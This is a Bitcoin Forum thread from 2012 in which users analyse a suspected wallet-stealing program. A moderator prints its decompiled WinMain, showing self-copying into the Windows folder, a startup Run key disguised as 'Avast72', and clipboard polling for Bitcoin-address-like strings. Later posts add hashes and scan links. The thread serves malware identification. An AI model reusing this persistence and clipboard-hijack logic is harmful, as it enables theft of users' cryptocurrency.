Bitcoin Forum
January 20, 2018, 03:31:01 PM *
News: Latest stable version of Bitcoin Core: 0.15.1  [Torrent].
 
   Home   Help Search Donate Login Register  
Pages: [1]
  Print  
Author Topic: "allseingbiteye" - a virus, or just weird?  (Read 2272 times)
ThePiachu
Sr. Member
****
Offline Offline

Activity: 442



View Profile WWW
January 28, 2012, 03:45:25 AM
 #1

On the Bitcoin SE someone mentioned this site:
http://[wallet stealer].tk/
Question can be found here:
http://bitcoin.stackexchange.com/q/2778/323

Has anyone checked whether this website is distributing some sort of virus?

1HWbVLhxj7bhewhyapMZpyhqWAeAhJd51E
My Bitcoin Calculator:
http://tpbitcalc.appspot.com/
1516462261
Hero Member
*
Offline Offline

Posts: 1516462261

View Profile Personal Message (Offline)

Ignore
1516462261
Reply with quote  #2

1516462261
Report to moderator
1516462261
Hero Member
*
Offline Offline

Posts: 1516462261

View Profile Personal Message (Offline)

Ignore
1516462261
Reply with quote  #2

1516462261
Report to moderator
There are several different types of Bitcoin clients. The most secure are full nodes like Bitcoin-Qt, but full nodes are more resource-heavy, and they must do a lengthy initial syncing process. As a result, lightweight clients with somewhat less security are commonly used.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1516462261
Hero Member
*
Offline Offline

Posts: 1516462261

View Profile Personal Message (Offline)

Ignore
1516462261
Reply with quote  #2

1516462261
Report to moderator
1516462261
Hero Member
*
Offline Offline

Posts: 1516462261

View Profile Personal Message (Offline)

Ignore
1516462261
Reply with quote  #2

1516462261
Report to moderator
1516462261
Hero Member
*
Offline Offline

Posts: 1516462261

View Profile Personal Message (Offline)

Ignore
1516462261
Reply with quote  #2

1516462261
Report to moderator
grue
Global Moderator
Legendary
*
Offline Offline

Activity: 2058



View Profile
January 28, 2012, 04:10:28 AM
 #2

most likely a virus

decompiled winmain
Code:
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
  int v4; // ebx@1
  unsigned int v5; // eax@9
  SIZE_T v6; // edi@10
  HANDLE v7; // esi@10
  const char *v8; // ecx@11
  HANDLE v9; // eax@11
  void *v10; // esi@11
  const CHAR *v11; // eax@11
  int v12; // ecx@14
  int v13; // edi@14
  CHAR v14; // al@15
  HKEY hKey; // [sp+Ch] [bp-17Ch]@30
  char v17; // [sp+13h] [bp-175h]@3
  void *v18; // [sp+14h] [bp-174h]@29
  unsigned int v19; // [sp+28h] [bp-160h]@28
  const char *v20; // [sp+30h] [bp-158h]@9
  int v21; // [sp+40h] [bp-148h]@9
  unsigned int v22; // [sp+44h] [bp-144h]@9
  CHAR ExistingFileName; // [sp+4Ch] [bp-13Ch]@1
  char v24; // [sp+61h] [bp-127h]@2
  char v25; // [sp+68h] [bp-120h]@1
  CHAR String1[52]; // [sp+150h] [bp-38h]@11
  unsigned int v27; // [sp+184h] [bp-4h]@1
  int v28; // [sp+188h] [bp+0h]@1

  v27 = (unsigned int)&v28 ^ __security_cookie;
  v4 = operator new(4u);
  *(_DWORD *)v4 = 33120;
  dword_40D9E4 = v4;
  memcpy(&ExistingFileName, "c:\\windows\\mcfartietrby.exe", 0x1Cu);
  memset(&v25, 0, 0xE8u);
  if ( sub_401040() == *(_DWORD *)v4 + 9 )
    --v24;
  *(_DWORD *)v4 += 9;
  v17 = strcmp(&ExistingFileName, (const char *)"c:\\windows\\mcfartietray.exe") == 0;
  if ( sub_401040() == *(_DWORD *)v4 )
  {
    if ( v17 )
    {
      if ( byte_40D9E8 )
        GetModuleFileNameA(0, &ExistingFileName, 0x104u);
    }
  }
  if ( CopyFileA(&ExistingFileName, (LPCSTR)"c:\\windows\\mcfartietray.exe", 1) )
  {
    RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 2u, &hKey);
    RegSetValueExA(hKey, "Avast72", 0, 1u, "c:\\windows\\mcfartietray.exe", 0x1Cu);
    ShellExecuteA(0, 0, (LPCSTR)"c:\\windows\\mcfartietray.exe", 0, "c:\\", 0);
    goto LABEL_31;
  }
  CreateMutexA(0, 0, "mcfartietray");
  if ( GetLastError() == 183 )
  {
LABEL_31:
    v0 = 0;
    return 0;
  }
  v5 = GetTickCount();
  srand(v5);
  v22 = 15;
  v21 = 0;
  LOBYTE(v20) = 0;
  if ( v17 )
  {
    while ( 1 )
    {
      do
      {
        do
        {
          Sleep(0x1F4u);
          OpenClipboard(0);
          v7 = GetClipboardData(1u);
          CloseClipboard();
          v6 = GlobalSize(v7);
        }
        while ( v6 - 30 > 9 );
        OpenClipboard(0);
        v9 = GetClipboardData(1u);
        v10 = v9;
        v11 = (const CHAR *)GlobalLock(v9);
        lstrcpyA(String1, v11);
        GlobalUnlock(v10);
        CloseClipboard();
        v8 = v20;
        if ( v22 < 0x10 )
          v8 = (const char *)&v20;
      }
      while ( !strcmp(String1, v8) );
      v13 = v6 - 1;
      v12 = 0;
      if ( v13 <= 0 )
      {
LABEL_26:
        if ( String1[0] == 49 || String1[0] == 51 )
        {
          sub_401430();
          sub_401590();
          if ( v19 >= 0x10 )
            operator delete(v18);
        }
      }
      else
      {
        while ( 1 )
        {
          v14 = String1[v12];
          if ( v14 < 49 || v14 > 57 )
          {
            if ( (v14 < 97 || v14 > 122) && (v14 < 65 || v14 > 90) )
              break;
          }
          if ( v14 == 108 || v14 == 73 || v14 == 79 || v14 == 48 )
            break;
          ++v12;
          if ( v12 >= v13 )
            goto LABEL_26;
        }
      }
    }
  }
  return 0;
}
it adds a program to system startup. pretty suspicious imo.
virus scan https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/
runtime analysis: http://anubis.iseclab.org/?action=result&task_id=17f90702efa19eb14a9df4ac9504bbf98&format=html

It is pitch black. You are likely to be eaten by a grue.

Tired of annoying signature ads? Ad block for signatures
dooglus
Legendary
*
Offline Offline

Activity: 2408



View Profile
January 28, 2012, 07:01:55 AM
 #3

decompiled winmain

That's pretty impressive.  What tool did you use to do that?

Just-Dice                 ██             
          ██████████         
      ██████████████████     
  ██████████████████████████ 
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
    ██████████████████████   
        ██████████████       
            ██████           
   Play or Invest                 ██             
          ██████████         
      ██████████████████     
  ██████████████████████████ 
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
    ██████████████████████   
        ██████████████       
            ██████           
   1% House Edge
sveetsnelda
Hero Member
*****
Offline Offline

Activity: 620


View Profile
January 28, 2012, 07:48:46 AM
 #4

It even makes the run entry look like it's an antivirus scanner (Avast72).  Smiley

Most certainly a virus/malware/spyware.

14u2rp4AqFtN5jkwK944nn741FnfF714m7
CD-RW
Jr. Member
*
Offline Offline

Activity: 57


View Profile
February 14, 2012, 09:12:47 AM
 #5

Sorry for bumping, I found some new information...
A new link got added about a Bitcoin generator on some Tor forum.

"Bitcoin generator.exe" 51.735    bytes.
SHA256: 1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b
Virustotal: https://www.virustotal.com/file/1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b/analysis/

I found this thread due the fact he still uses c:\windows\mcfartietrby.exe
I also found this email in the binary data: seren1ty0wns@gmail.com

Threatexpert for the file: http://www.threatexpert.com/report.aspx?md5=ede9632fc341e0279bb3f8a49b8730f1
MPOE-PR
Hero Member
*****
Offline Offline

Activity: 756



View Profile
April 20, 2012, 12:50:06 AM
 #6

Quote
mcfartietray.exe

...McFartieTray?! Sounds foul either way.

My Credentials  | THE BTC Stock Exchange | I have my very own anthology! | Use bitcointa.lk, it's like this one but better.
Pages: [1]
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!